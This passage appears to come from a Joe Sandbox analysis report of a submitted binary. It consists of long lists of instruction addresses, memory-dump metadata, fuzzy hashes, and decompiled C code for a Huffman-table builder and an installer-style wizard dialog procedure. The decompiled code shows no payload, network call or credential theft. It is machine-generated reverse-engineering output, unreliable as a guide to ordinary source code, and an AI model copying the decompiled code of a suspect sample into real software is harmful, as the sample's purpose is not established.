                0x00406d6b
                0x00406d6e
                0x00406d74
                0x00406d79
                0x00406d7f
                0x00406d85
                0x00406d87
                0x00406d8a
                0x00406d93
                0x00406d99
                0x00406d99
                0x00406d8c
                0x00406d8e
                0x00406d90
                0x00406d90
                0x00406d9b
                0x00406da1
                0x00406da3
                0x00406da6
                0x00406da8
                0x00406dae
                0x00406db0
                0x00406db2
                0x00406db4
                0x00406db6
                0x00406db9
                0x00406dc2
                0x00406dc5
                0x00406dc5
                0x00406dbb
                0x00406dbb
                0x00406dbe
                0x00406dbe
                0x00406db9
                0x00406db0
                0x00406dc7
                0x00406dc9
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406dc9
                0x00406d48
                0x00406d48
                0x00406d4e
                0x00406d54
                0x00406d56
                0x00000000
                0x00000000
                0x00406d58
                0x00406d58
                0x00406d5a
                0x00406d5c
                0x00406d63
                0x00406d63
                0x00406d65
                0x00406d5e
                0x00406d5e
                0x00406d60
                0x00406d60
                0x00406d67
                0x00406d69
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406de1
                0x00406de1
                0x00406de4
                0x00406de6
                0x00406de9
                0x00406dec
                0x00406dec
                0x00406dec
                0x00406dec
                0x00000000
                0x00000000
                0x00000000
                0x0040649a
                0x0040647e
                0x00000000
                0x00406484
                0x00406487
                0x00406491
                0x00406494
                0x00406497
                0x00000000
                0x00406497
                0x0040647e
                0x004064a2
                0x004064a5
                0x004064a9
                0x004064b3
                0x004064bd
                0x004064c0
                0x004064c6
                0x004065fa
                0x004065fc
                0x00406602
                0x00406605
                0x00406608
                0x00000000
                0x00406608
                0x004064cc
                0x004064cc
                0x004064cd
                0x00406525
                0x00406525
                0x0040652c
                0x004065d2
                0x004065d2
                0x004065d7
                0x004065da
                0x004065df
                0x004065e2
                0x004065e7
                0x004065ea
                0x004065ef
                0x004065f2
                0x004065f2
                0x00000000
                0x00406532
                0x00406532
                0x00406532
                0x00406532
                0x00406536
                0x00406536
                0x00406558
                0x0040655b
                0x0040655d
                0x00406560
                0x00406565
                0x0040653b
                0x0040653b
                0x00406540
                0x00406542
                0x00406544
                0x00406549
                0x0040654f
                0x00406554
                0x00406556
                0x00406556
                0x0040654b
                0x0040654b
                0x0040654b
                0x00406549
                0x00000000
                0x00406567
                0x00406594
                0x00406599
                0x0040659b
                0x0040659c
                0x0040659e
                0x0040659f
                0x0040659f
                0x0040659f
                0x004065c7
                0x004065cc
                0x004065cc
                0x00000000
                0x004065cc
                0x00406565
                0x0040652c
                0x004064cf
                0x004064cf
                0x004064d0
                0x0040651a
                0x00000000
                0x0040651a
                0x004064d2
                0x004064d3
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0040662f
                0x0040662f
                0x0040662f
                0x00406632
                0x00000000
                0x00000000
                0x0040660f
                0x0040660f
                0x00406613
                0x00000000
                0x00000000
                0x00406619
                0x00406619
                0x0040661c
                0x0040661f
                0x00406624
                0x00406626
                0x00406629
                0x0040662c
                0x0040662c
                0x0040662c
                0x00406634
                0x00406634
                0x00406637
                0x00406639
                0x0040663e
                0x00406641
                0x00406643
                0x00406646
                0x00000000
                0x00000000
                0x0040664c
                0x0040664c
                0x0040664e
                0x00000000
                0x00000000
                0x00406654
                0x00406654
                0x00406658
                0x00000000
                0x00000000
                0x0040665e
                0x0040665e
                0x00406661
                0x00406663
                0x00406701
                0x00406701
                0x00406704
                0x00406706
                0x00406706
                0x00406709
                0x0040670c
                0x0040670e
                0x00406710
                0x00406712
                0x00406712
                0x0040671b
                0x00406720
                0x00406723
                0x00406726
                0x00406729
                0x0040672c
                0x0040672c
                0x0040672c
                0x0040672f
                0x00406735
                0x00406735
                0x0040673b
                0x0040673b
                0x0040673b
                0x00000000
                0x0040672f
                0x00406669
                0x00406669
                0x0040666f
                0x00406672
                0x00406674
                0x0040669f
                0x004066a2
                0x004066a8
                0x004066ad
                0x004066b3
                0x004066b9
                0x004066bb
                0x004066be
                0x004066c7
                0x004066cd
                0x004066cd
                0x004066c0
                0x004066c2
                0x004066c4
                0x004066c4
                0x004066cf
                0x004066d5
                0x004066d8
                0x004066da
                0x004066dc
                0x004066e2
                0x004066e4
                0x004066e6
                0x004066e9
                0x004066f2
                0x004066f2
                0x004066f4
                0x004066eb
                0x004066eb
                0x004066ee
                0x004066ee
                0x004066f6
                0x004066f6
                0x004066e4
                0x004066f9
                0x004066fb
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004066fb
                0x00406676
                0x00406676
                0x0040667c
                0x00406682
                0x00406684
                0x00000000
                0x00000000
                0x00406686
                0x00406686
                0x00406688
                0x0040668a
                0x0040668d
                0x00406694
                0x00406694
                0x00406696
                0x0040668f
                0x0040668f
                0x00406691
                0x00406691
                0x00406698
                0x0040669a
                0x0040669d
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004067a1
                0x004067a4
                0x004067a7
                0x004067ad
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406984
                0x00406984
                0x00406984
                0x00406987
                0x0040698a
                0x0040698c
                0x0040698f
                0x00406995
                0x0040699c
                0x0040699e
                0x00000000
                0x00000000
                0x00406872
                0x00406872
                0x0040689a
                0x0040689a
                0x0040689a
                0x0040689c
                0x00000000
                0x00000000
                0x0040687a
                0x0040687a
                0x0040687e
                0x00000000
                0x00000000
                0x00406884
                0x00406884
                0x00406887
                0x0040688a
                0x0040688d
                0x0040688f
                0x00406891
                0x00406894
                0x00406897
                0x00406897
                0x00406897
                0x0040689e
                0x0040689e
                0x004068a6
                0x004068a9
                0x004068af
                0x004068b2
                0x004068b6
                0x004068ba
                0x004068bd
                0x004068c0
                0x004068d8
                0x004068d8
                0x004068db
                0x004068e9
                0x004068ec
                0x004068dd
                0x004068dd
                0x004068df
                0x004068e6
                0x004068e6
                0x00406915
                0x00406915
                0x00406915
                0x00406918
                0x0040691a
                0x00000000
                0x00000000
                0x004068f5
                0x004068f5
                0x004068f9
                0x00000000
                0x00000000
                0x004068ff
                0x004068ff
                0x00406902
                0x00406905
                0x00406908
                0x0040690a
                0x0040690c
                0x0040690f
                0x00406912
                0x00406912
                0x00406912
                0x0040691c
                0x0040691c
                0x0040691e
                0x00406920
                0x0040692b
                0x0040692e
                0x00406931
                0x00406933
                0x00406935
                0x00406937
                0x0040693a
                0x0040693d
                0x00406942
                0x00406945
                0x00406948
                0x0040694b
                0x00406952
                0x00406955
                0x00406957
                0x00000000
                0x00000000
                0x0040695d
                0x0040695d
                0x00406961
                0x00406972
                0x00406972
                0x00406972
                0x00406974
                0x00406974
                0x00406978
                0x00406978
                0x00406978
                0x0040697a
                0x0040697b
                0x0040697e
                0x0040697e
                0x0040697e
                0x00406981
                0x00000000
                0x00406981
                0x00406963
                0x00406963
                0x00406966
                0x00000000
                0x00000000
                0x0040696c
                0x0040696c
                0x00000000
                0x0040696c
                0x004068c2
                0x004068c2
                0x004068c4
                0x004068c6
                0x004068c9
                0x004068cc
                0x004068d0
                0x004068d0
                0x004069a4
                0x004069a4
                0x004069a7
                0x004069ae
                0x004069b2
                0x004069b4
                0x004069b7
                0x004069ba
                0x004069bf
                0x004069c2
                0x004069c4
                0x004069c5
                0x004069c8
                0x004069d3
                0x004069d6
                0x004069ed
                0x004069f2
                0x004069f9
                0x004069fe
                0x00406a02
                0x00406a04
                0x00406a04
                0x00406a04
                0x00406a07
                0x00406a09
                0x00000000
                0x00406a0f
                0x00406a0f
                0x00406a13
                0x00406a1e
                0x00406a31
                0x00406a36
                0x00406a3b
                0x00406a3d
                0x00000000
                0x00000000
                0x00406a43
                0x00406a43
                0x00406a46
                0x00406a48
                0x00406a56
                0x00406a56
                0x00406a59
                0x00406a59
                0x00406a5c
                0x00406a5f
                0x00406a62
                0x00406a65
                0x00406a68
                0x00406a6b
                0x00000000
                0x00406a6b
                0x00406a4a
                0x00406a4a
                0x00406a50
                0x00000000
                0x00000000
                0x00000000
                0x00406a50
                0x00000000
                0x00000000
                0x00000000
                0x00406def
                0x00406def
                0x00406df5
                0x00406dfb
                0x00406e00
                0x00406e06
                0x00406e0c
                0x00406e0e
                0x00406e11
                0x00406e1a
                0x00406e20
                0x00406e20
                0x00406e13
                0x00406e15
                0x00406e17
                0x00406e17
                0x00406e22
                0x00406e24
                0x00406e27
                0x00406e62
                0x00406e62
                0x00000000
                0x00406e29
                0x00406e29
                0x00406e29
                0x00406e2f
                0x00406e32
                0x00406e34
                0x00406e69
                0x00406e6b
                0x00000000
                0x00406e6b
                0x00000000
                0x00406e34
                0x00000000
                0x00406473
                0x00406e41
                0x00000000
                0x00406e41
                0x00406855
                0x00406857
                0x00000000
                0x00000000
                0x00406859
                0x00406859
                0x0040685c
                0x00000000
                0x0040685c
                0x004067a1
                0x00406762
                0x00406e46
                0x00406e49
                0x00406e4b
                0x00406e54
                0x00406e5a
                0x00000000

                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8a4aeacf9715bb3b10a0377ad2d0224b4eefc29aff23ed095be582f5b156e71c
                • Instruction ID: 12ef56279526f9f53f22afc89151adbe845766d01d6fb7ada6890335ffbed449
                • Opcode Fuzzy Hash: 8a4aeacf9715bb3b10a0377ad2d0224b4eefc29aff23ed095be582f5b156e71c
                • Instruction Fuzzy Hash: 5EE19A7190070ADFCB24CF58C980BAABBF1EB45305F15852EE497A72D1E338AA91CF44
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00406F19(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
                				signed int _v8;
                				unsigned int _v12;
                				signed int _v16;
                				intOrPtr _v20;
                				signed int _v24;
                				signed int _v28;
                				intOrPtr* _v32;
                				signed int* _v36;
                				signed int _v40;
                				signed int _v44;
                				intOrPtr _v48;
                				intOrPtr _v52;
                				void _v116;
                				signed int _v176;
                				signed int _v180;
                				signed int _v240;
                				signed int _t166;
                				signed int _t168;
                				intOrPtr _t175;
                				signed int _t181;
                				void* _t182;
                				intOrPtr _t183;
                				signed int* _t184;
                				signed int _t186;
                				signed int _t187;
                				signed int* _t189;
                				signed int _t190;
                				intOrPtr* _t191;
                				intOrPtr _t192;
                				signed int _t193;
                				signed int _t195;
                				signed int _t200;
                				signed int _t205;
                				void* _t207;
                				short _t208;
                				signed char _t222;
                				signed int _t224;
                				signed int _t225;
                				signed int* _t232;
                				signed int _t233;
                				signed int _t234;
                				void* _t235;
                				signed int _t236;
                				signed int _t244;
                				signed int _t246;
                				signed int _t251;
                				signed int _t254;
                				signed int _t256;
                				signed int _t259;
                				signed int _t262;
                				void* _t263;
                				void* _t264;
                				signed int _t267;
                				intOrPtr _t269;
                				intOrPtr _t271;
                				signed int _t274;
                				intOrPtr* _t275;
                				unsigned int _t276;
                				void* _t277;
                				signed int _t278;
                				intOrPtr* _t279;
                				signed int _t281;
                				intOrPtr _t282;
                				intOrPtr _t283;
                				signed int* _t284;
                				signed int _t286;
                				signed int _t287;
                				signed int _t288;
                				signed int _t296;
                				signed int* _t297;
                				intOrPtr _t298;
                				void* _t299;
                
                				_t278 = _a8;
                				_t187 = 0x10;
                				memset( &_v116, 0, _t187 << 2);
                				_t189 = _a4;
                				_t233 = _t278;
                				do {
                					_t166 =  *_t189;
                					_t189 =  &(_t189[1]);
                					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
                					_t233 = _t233 - 1;
                				} while (_t233 != 0);
                				if(_v116 != _t278) {
                					_t279 = _a28;
                					_t267 =  *_t279;
                					_t190 = 1;
                					_a28 = _t267;
                					_t234 = 0xf;
                					while(1) {
                						_t168 = 0;
                						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
                							break;
                						}
                						_t190 = _t190 + 1;
                						if(_t190 <= _t234) {
                							continue;
                						}
                						break;
                					}
                					_v8 = _t190;
                					if(_t267 < _t190) {
                						_a28 = _t190;
                					}
                					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
                						_t234 = _t234 - 1;
                						if(_t234 != 0) {
                							continue;
                						}
                						break;
                					}
                					_v28 = _t234;
                					if(_a28 > _t234) {
                						_a28 = _t234;
                					}
                					 *_t279 = _a28;
                					_t181 = 1 << _t190;
                					while(_t190 < _t234) {
                						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
                						if(_t182 < 0) {
                							L64:
                							return _t168 | 0xffffffff;
                						}
                						_t190 = _t190 + 1;
                						_t181 = _t182 + _t182;
                					}
                					_t281 = _t234 << 2;
                					_t191 = _t299 + _t281 - 0x70;
                					_t269 =  *_t191;
                					_t183 = _t181 - _t269;
                					_v52 = _t183;
                					if(_t183 < 0) {
                						goto L64;
                					}
                					_v176 = _t168;
                					 *_t191 = _t269 + _t183;
                					_t192 = 0;
                					_t235 = _t234 - 1;
                					if(_t235 == 0) {
                						L21:
                						_t184 = _a4;
                						_t271 = 0;
                						do {
                							_t193 =  *_t184;
                							_t184 =  &(_t184[1]);
                							if(_t193 != _t168) {
                								_t232 = _t299 + _t193 * 4 - 0xb0;
                								_t236 =  *_t232;
                								 *((intOrPtr*)(0x42d688 + _t236 * 4)) = _t271;
                								 *_t232 = _t236 + 1;
                							}
                							_t271 = _t271 + 1;
                						} while (_t271 < _a8);
                						_v16 = _v16 | 0xffffffff;
                						_v40 = _v40 & 0x00000000;
                						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
                						_t195 = _v8;
                						_t186 =  ~_a28;
                						_v12 = _t168;
                						_v180 = _t168;
                						_v36 = 0x42d688;
                						_v240 = _t168;
                						if(_t195 > _v28) {
                							L62:
                							_t168 = 0;
                							if(_v52 == 0 || _v28 == 1) {
                								return _t168;
                							} else {
                								goto L64;
                							}
                						}
                						_v44 = _t195 - 1;
                						_v32 = _t299 + _t195 * 4 - 0x70;
                						do {
                							_t282 =  *_v32;
                							if(_t282 == 0) {
                								goto L61;
                							}
                							while(1) {
                								_t283 = _t282 - 1;
                								_t200 = _a28 + _t186;
                								_v48 = _t283;
                								_v24 = _t200;
                								if(_v8 <= _t200) {
                									goto L45;
                								}
                								L31:
                								_v20 = _t283 + 1;
                								do {
                									_v16 = _v16 + 1;
                									_t296 = _v28 - _v24;
                									if(_t296 > _a28) {
                										_t296 = _a28;
                									}
                									_t222 = _v8 - _v24;
                									_t254 = 1 << _t222;
                									if(1 <= _v20) {
                										L40:
                										_t256 =  *_a36;
                										_t168 = 1 << _t222;
                										_v40 = 1;
                										_t274 = _t256 + 1;
                										if(_t274 > 0x5a0) {
                											goto L64;
                										}
                									} else {
                										_t275 = _v32;
                										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
                										if(_t222 >= _t296) {
                											goto L40;
                										}
                										while(1) {
                											_t222 = _t222 + 1;
                											if(_t222 >= _t296) {
                												goto L40;
                											}
                											_t275 = _t275 + 4;
                											_t264 = _t263 + _t263;
                											_t175 =  *_t275;
                											if(_t264 <= _t175) {
                												goto L40;
                											}
                											_t263 = _t264 - _t175;
                										}
                										goto L40;
                									}
                									_t168 = _a32 + _t256 * 4;
                									_t297 = _t299 + _v16 * 4 - 0xec;
                									 *_a36 = _t274;
                									_t259 = _v16;
                									 *_t297 = _t168;
                									if(_t259 == 0) {
                										 *_a24 = _t168;
                									} else {
                										_t276 = _v12;
                										_t298 =  *((intOrPtr*)(_t297 - 4));
                										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
                										_a5 = _a28;
                										_a4 = _t222;
                										_t262 = _t276 >> _t186;
                										_a6 = (_t168 - _t298 >> 2) - _t262;
                										 *(_t298 + _t262 * 4) = _a4;
                									}
                									_t224 = _v24;
                									_t186 = _t224;
                									_t225 = _t224 + _a28;
                									_v24 = _t225;
                								} while (_v8 > _t225);
                								L45:
                								_t284 = _v36;
                								_a5 = _v8 - _t186;
                								if(_t284 < 0x42d688 + _a8 * 4) {
                									_t205 =  *_t284;
                									if(_t205 >= _a12) {
                										_t207 = _t205 - _a12 + _t205 - _a12;
                										_v36 =  &(_v36[1]);
                										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
                										_t208 =  *((intOrPtr*)(_t207 + _a16));
                									} else {
                										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
                										_t208 =  *_t284;
                										_v36 =  &(_t284[1]);
                									}
                									_a6 = _t208;
                								} else {
                									_a4 = 0xc0;
                								}
                								_t286 = 1 << _v8 - _t186;
                								_t244 = _v12 >> _t186;
                								while(_t244 < _v40) {
                									 *(_t168 + _t244 * 4) = _a4;
                									_t244 = _t244 + _t286;
                								}
                								_t287 = _v12;
                								_t246 = 1 << _v44;
                								while((_t287 & _t246) != 0) {
                									_t287 = _t287 ^ _t246;
                									_t246 = _t246 >> 1;
                								}
                								_t288 = _t287 ^ _t246;
                								_v20 = 1;
                								_v12 = _t288;
                								_t251 = _v16;
                								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
                									L60:
                									if(_v48 != 0) {
                										_t282 = _v48;
                										_t283 = _t282 - 1;
                										_t200 = _a28 + _t186;
                										_v48 = _t283;
                										_v24 = _t200;
                										if(_v8 <= _t200) {
                											goto L45;
                										}
                										goto L31;
                									}
                									break;
                								} else {
                									goto L58;
                								}
                								do {
                									L58:
                									_t186 = _t186 - _a28;
                									_t251 = _t251 - 1;
                								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
                								_v16 = _t251;
                								goto L60;
                							}
                							L61:
                							_v8 = _v8 + 1;
                							_v32 = _v32 + 4;
                							_v44 = _v44 + 1;
                						} while (_v8 <= _v28);
                						goto L62;
                					}
                					_t277 = 0;
                					do {
                						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
                						_t277 = _t277 + 4;
                						_t235 = _t235 - 1;
                						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
                					} while (_t235 != 0);
                					goto L21;
                				}
                				 *_a24 =  *_a24 & 0x00000000;
                				 *_a28 =  *_a28 & 0x00000000;
                				return 0;
                			}

                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • Opcode ID: fca4b55698b2abcc8e5cbf272b741b12ffb4e3b740e9774b5bdfc5da95159218
                • Instruction ID: 968ea090ea57439d934916100a42e081e4144f1e312078ddc892fc3721ce49e9
                • Opcode Fuzzy Hash: fca4b55698b2abcc8e5cbf272b741b12ffb4e3b740e9774b5bdfc5da95159218
                • Instruction Fuzzy Hash: 18C14A31E0421ACBCF14CF68D4905EEBBB2BF99314F25866AD8567B380D734A942CF95
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 84%
                			E00403B52(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                				struct HWND__* _v32;
                				void* _v84;
                				void* _v88;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				signed int _t35;
                				signed int _t37;
                				signed int _t39;
                				struct HWND__* _t49;
                				signed int _t68;
                				struct HWND__* _t74;
                				signed int _t87;
                				struct HWND__* _t92;
                				signed int _t100;
                				int _t104;
                				signed int _t116;
                				signed int _t117;
                				int _t118;
                				signed int _t123;
                				struct HWND__* _t126;
                				struct HWND__* _t127;
                				int _t128;
                				long _t131;
                				int _t133;
                				int _t134;
                				void* _t135;
                				void* _t142;
                				void* _t143;
                
                				_t116 = _a8;
                				if(_t116 == 0x110 || _t116 == 0x408) {
                					_t35 = _a12;
                					_t126 = _a4;
                					__eflags = _t116 - 0x110;
                					 *0x42a858 = _t35;
                					if(_t116 == 0x110) {
                						 *0x42f408 = _t126;
                						 *0x42a86c = GetDlgItem(_t126, 1);
                						_t92 = GetDlgItem(_t126, 2);
                						_push(0xffffffff);
                						_push(0x1c);
                						 *0x429838 = _t92;
                						E00404026(_t126);
                						SetClassLongA(_t126, 0xfffffff2,  *0x42ebe8);
                						 *0x42ebcc = E0040140B(4);
                						_t35 = 1;
                						__eflags = 1;
                						 *0x42a858 = 1;
                					}
                					_t123 =  *0x40a1dc; // 0xffffffff
                					_t134 = 0;
                					_t131 = (_t123 << 6) +  *0x42f440;
                					__eflags = _t123;
                					if(_t123 < 0) {
                						L34:
                						E00404072(0x40b);
                						while(1) {
                							_t37 =  *0x42a858;
                							 *0x40a1dc =  *0x40a1dc + _t37;
                							_t131 = _t131 + (_t37 << 6);
                							_t39 =  *0x40a1dc; // 0xffffffff
                							__eflags = _t39 -  *0x42f444;
                							if(_t39 ==  *0x42f444) {
                								E0040140B(1);
                							}
                							__eflags =  *0x42ebcc - _t134; // 0x1
                							if(__eflags != 0) {
                								break;
                							}
                							__eflags =  *0x40a1dc -  *0x42f444; // 0xffffffff
                							if(__eflags >= 0) {
                								break;
                							}
                							_t117 =  *(_t131 + 0x14);
                							E00405F87(_t117, _t126, _t131, 0x437800,  *((intOrPtr*)(_t131 + 0x24)));
                							_push( *((intOrPtr*)(_t131 + 0x20)));
                							_push(0xfffffc19);
                							E00404026(_t126);
                							_push( *((intOrPtr*)(_t131 + 0x1c)));
                							_push(0xfffffc1b);
                							E00404026(_t126);
                							_push( *((intOrPtr*)(_t131 + 0x28)));
                							_push(0xfffffc1a);
                							E00404026(_t126);
                							_t49 = GetDlgItem(_t126, 3);
                							__eflags =  *0x42f4ac - _t134;
                							_v32 = _t49;
                							if( *0x42f4ac != _t134) {
                								_t117 = _t117 & 0x0000fefd | 0x00000004;
                								__eflags = _t117;
                							}
                							ShowWindow(_t49, _t117 & 0x00000008);
                							EnableWindow( *(_t135 + 0x30), _t117 & 0x00000100);
                							E00404048(_t117 & 0x00000002);
                							_t118 = _t117 & 0x00000004;
                							EnableWindow( *0x429838, _t118);
                							__eflags = _t118 - _t134;
                							if(_t118 == _t134) {
                								_push(1);
                							} else {
                								_push(_t134);
                							}
                							EnableMenuItem(GetSystemMenu(_t126, _t134), 0xf060, ??);
                							SendMessageA( *(_t135 + 0x38), 0xf4, _t134, 1);
                							__eflags =  *0x42f4ac - _t134;
                							if( *0x42f4ac == _t134) {
                								_push( *0x42a86c);
                							} else {
                								SendMessageA(_t126, 0x401, 2, _t134);
                								_push( *0x429838);
                							}
                							E0040405B();
                							E00405F65(0x42a870, E00403B33());
                							E00405F87(0x42a870, _t126, _t131,  &(0x42a870[lstrlenA(0x42a870)]),  *((intOrPtr*)(_t131 + 0x18)));
                							SetWindowTextA(_t126, 0x42a870);
                							_push(_t134);
                							_t68 = E00401389( *((intOrPtr*)(_t131 + 8)));
                							__eflags = _t68;
                							if(_t68 != 0) {
                								continue;
                							} else {
                								__eflags =  *_t131 - _t134;
                								if( *_t131 == _t134) {
                									continue;
                								}
                								__eflags =  *(_t131 + 4) - 5;
                								if( *(_t131 + 4) != 5) {
                									DestroyWindow( *0x42ebd8);
                									 *0x42a048 = _t131;
                									__eflags =  *_t131 - _t134;
                									if( *_t131 <= _t134) {
                										goto L58;
                									}
                									_t74 = CreateDialogParamA( *0x42f400,  *_t131 +  *0x42ebe0 & 0x0000ffff, _t126,  *(0x40a1e0 +  *(_t131 + 4) * 4), _t131);
                									__eflags = _t74 - _t134;
                									 *0x42ebd8 = _t74;
                									if(_t74 == _t134) {
                										goto L58;
                									}
                									_push( *((intOrPtr*)(_t131 + 0x2c)));
                									_push(6);
                									E00404026(_t74);
                									GetWindowRect(GetDlgItem(_t126, 0x3fa), _t135 + 0x10);
                									ScreenToClient(_t126, _t135 + 0x10);
                									SetWindowPos( *0x42ebd8, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
                									_push(_t134);
                									E00401389( *((intOrPtr*)(_t131 + 0xc)));
                									__eflags =  *0x42ebcc - _t134; // 0x1
                									if(__eflags != 0) {
                										goto L61;
                									}
                									ShowWindow( *0x42ebd8, 8);
                									E00404072(0x405);
                									goto L58;
                								}
                								__eflags =  *0x42f4ac - _t134;
                								if( *0x42f4ac != _t134) {
                									goto L61;
                								}
                								__eflags =  *0x42f4a0 - _t134;
                								if( *0x42f4a0 != _t134) {
                									continue;
                								}
                								goto L61;
                							}
                						}
                						DestroyWindow( *0x42ebd8);
                						 *0x42f408 = _t134;
                						EndDialog(_t126,  *0x429c40);
                						goto L58;
                					} else {
                						__eflags = _t35 - 1;
                						if(_t35 != 1) {
                							L33:
                							__eflags =  *_t131 - _t134;
                							if( *_t131 == _t134) {
                								goto L61;
                							}
                							goto L34;
                						}
                						_push(0);
                						_t87 = E00401389( *((intOrPtr*)(_t131 + 0x10)));
                						__eflags = _t87;
                						if(_t87 == 0) {
                							goto L33;
                						}
                						SendMessageA( *0x42ebd8, 0x40f, 0, 1);
                						__eflags =  *0x42ebcc - _t134; // 0x1
                						return 0 | __eflags == 0x00000000;
                					}
                				} else {
                					_t126 = _a4;
                					_t134 = 0;
                					if(_t116 == 0x47) {
                						SetWindowPos( *0x42a850, _t126, 0, 0, 0, 0, 0x13);
                					}
                					if(_t116 == 5) {
                						asm("sbb eax, eax");
                						ShowWindow( *0x42a850,  ~(_a12 - 1) & _t116);
                					}
                					if(_t116 != 0x40d) {
                						__eflags = _t116 - 0x11;
                						if(_t116 != 0x11) {
                							__eflags = _t116 - 0x111;
                							if(_t116 != 0x111) {
                								L26:
                								return E0040408D(_t116, _a12, _a16);
                							}
                							_t133 = _a12 & 0x0000ffff;
                							_t127 = GetDlgItem(_t126, _t133);
                							__eflags = _t127 - _t134;
                							if(_t127 == _t134) {
                								L13:
                								__eflags = _t133 - 1;
                								if(_t133 != 1) {
                									__eflags = _t133 - 3;
                									if(_t133 != 3) {
                										_t128 = 2;
                										__eflags = _t133 - _t128;
                										if(_t133 != _t128) {
                											L25:
                											SendMessageA( *0x42ebd8, 0x111, _a12, _a16);
                											goto L26;
                										}
                										__eflags =  *0x42f4ac - _t134;
                										if( *0x42f4ac == _t134) {
                											_t100 = E0040140B(3);
                											__eflags = _t100;
                											if(_t100 != 0) {
                												goto L26;
                											}
                											 *0x429c40 = 1;
                											L21:
                											_push(0x78);
                											L22:
                											E00403FFF();
                											goto L26;
                										}
                										E0040140B(_t128);
                										 *0x429c40 = _t128;
                										goto L21;
                									}
                									__eflags =  *0x40a1dc - _t134; // 0xffffffff
                									if(__eflags <= 0) {
                										goto L25;
                									}
                									_push(0xffffffff);
                									goto L22;
                								}
                								_push(_t133);
                								goto L22;
                							}
                							SendMessageA(_t127, 0xf3, _t134, _t134);
                							_t104 = IsWindowEnabled(_t127);
                							__eflags = _t104;
                							if(_t104 == 0) {
                								goto L61;
                							}
                							goto L13;
                						}
                						SetWindowLongA(_t126, _t134, _t134);
                						return 1;
                					} else {
                						DestroyWindow( *0x42ebd8);
                						 *0x42ebd8 = _a12;
                						L58:
                						_t142 =  *0x42b870 - _t134; // 0x0
                						if(_t142 == 0) {
                							_t143 =  *0x42ebd8 - _t134; // 0x0
                							if(_t143 != 0) {
                								ShowWindow(_t126, 0xa);
                								 *0x42b870 = 1;
                							}
                						}
                						L61:
                						return 0;
                					}
                				}
                			}
                0x00000000
                0x00403d3a
                0x00403d42
                0x00000000
                0x00403d48
                0x00403b76
                0x00403b76
                0x00403b7a
                0x00403b7f
                0x00403b8e
                0x00403b8e
                0x00403b97
                0x00403ba0
                0x00403bab
                0x00403bab
                0x00403bb7
                0x00403bd3
                0x00403bd6
                0x00403be9
                0x00403bef
                0x00403c92
                0x00000000
                0x00403c9b
                0x00403bf5
                0x00403c02
                0x00403c04
                0x00403c06
                0x00403c25
                0x00403c25
                0x00403c28
                0x00403c2d
                0x00403c30
                0x00403c40
                0x00403c41
                0x00403c43
                0x00403c79
                0x00403c8c
                0x00000000
                0x00403c8c
                0x00403c45
                0x00403c4b
                0x00403c64
                0x00403c69
                0x00403c6b
                0x00000000
                0x00000000
